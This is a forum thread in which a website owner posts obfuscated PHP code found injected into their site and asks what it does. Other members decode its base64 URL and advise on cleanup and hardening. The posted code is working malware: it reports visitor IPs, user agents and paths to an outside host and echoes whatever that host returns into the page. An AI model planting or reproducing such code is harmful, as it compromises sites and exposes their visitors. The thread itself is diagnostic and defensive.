SitePoint Sponsor

User Tag List

Results 1 to 4 of 4
  1. #1
    SitePoint Addict
    Join Date
    Nov 2009
    Posts
    311
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

    Unkown possible malicious code

    Hi,

    I checked one of my websites recently and I found the following code and I have no idea how it was placed there and what it does. If you have an idea what it does, could you please tell me.

    PHP Code:
    <?php
    if (!isset($sRetry))
    {
    global 
    $sRetry;
    $sRetry 1;
        
    // This code use for global bot statistic
        
    $sUserAgent strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
        
    $stCurlHandle NULL;
        
    $stCurlLink "";
        if((
    strstr($sUserAgent'google') == false)&&(strstr($sUserAgent'yahoo') == false)&&(strstr($sUserAgent'baidu') == false)&&(strstr($sUserAgent'msn') == false)&&(strstr($sUserAgent'opera') == false)&&(strstr($sUserAgent'chrome') == false)&&(strstr($sUserAgent'bing') == false)&&(strstr($sUserAgent'safari') == false)&&(strstr($sUserAgent'bot') == false)) // Bot comes
        
    {
            if(isset(
    $_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
            
    $stCurlLink base64_decode'aHR0cDovL2Jyb3dzZXJnbG9iYWxzdGF0LmNvbS9zdGF0RC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
                @
    $stCurlHandle curl_init$stCurlLink ); 
        }
        } 
    if ( 
    $stCurlHandle !== NULL )
    {
        
    curl_setopt($stCurlHandleCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($stCurlHandleCURLOPT_TIMEOUT6);
        
    $sResult = @curl_exec($stCurlHandle); 
        if (
    $sResult[0]=="O"
         {
    $sResult[0]=" ";
          echo 
    $sResult// Statistic code end
          
    }
        
    curl_close($stCurlHandle); 
    }
    }
    ?>

  2. #2
    SitePoint Enthusiast
    Join Date
    Dec 2011
    Posts
    27
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    It sends statistics to http://browserglobalstat.com/statD/stat.php
    The url got from the base64 decode.

  3. #3
    SitePoint Wizard
    Join Date
    Oct 2005
    Posts
    1,849
    Mentioned
    5 Post(s)
    Tagged
    1 Thread(s)
    Any time you see obfuscated code or base64_decode or any other function to handle obfuscated code in PHP or Javascript, that is a sign that something is not right. Legitimate coders don't try to hide what they are doing. A search for browserglobalstat.com reveals that another person on another board complained about his code being modified similar to what happened to you. How access was gained to your account is anyone's guess.

    Definitely remove the offending code, or better yet, restore all of your files from backups you know are clean and change all your passwords, including your hosting control panel and FTP passwords. And make sure your file permissions are set properly as recommended by your web host. Hackers like to put in back doors so they can get into your account again if the main exploit is found. If you are using any open source scripts, make sure they are updated to the latest version.

  4. #4
    SitePoint Addict
    Join Date
    Nov 2009
    Posts
    311
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Quote Originally Posted by Frenz48 View Post
    It sends statistics to http://browserglobalstat.com/statD/stat.php
    The url got from the base64 decode.
    Thanks for the info.

    Quote Originally Posted by cheesedude View Post
    Any time you see obfuscated code or base64_decode or any other function to handle obfuscated code in PHP or Javascript, that is a sign that something is not right. Legitimate coders don't try to hide what they are doing. A search for browserglobalstat.com reveals that another person on another board complained about his code being modified similar to what happened to you. How access was gained to your account is anyone's guess.

    Definitely remove the offending code, or better yet, restore all of your files from backups you know are clean and change all your passwords, including your hosting control panel and FTP passwords. And make sure your file permissions are set properly as recommended by your web host. Hackers like to put in back doors so they can get into your account again if the main exploit is found. If you are using any open source scripts, make sure they are updated to the latest version.
    Thanks a lot for the suggestions. I have no idea how this code was inserted there but whether it was done manually or by a script, it was inserted at a wrong place so that the page gave an error. That's how I spotted it.


Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •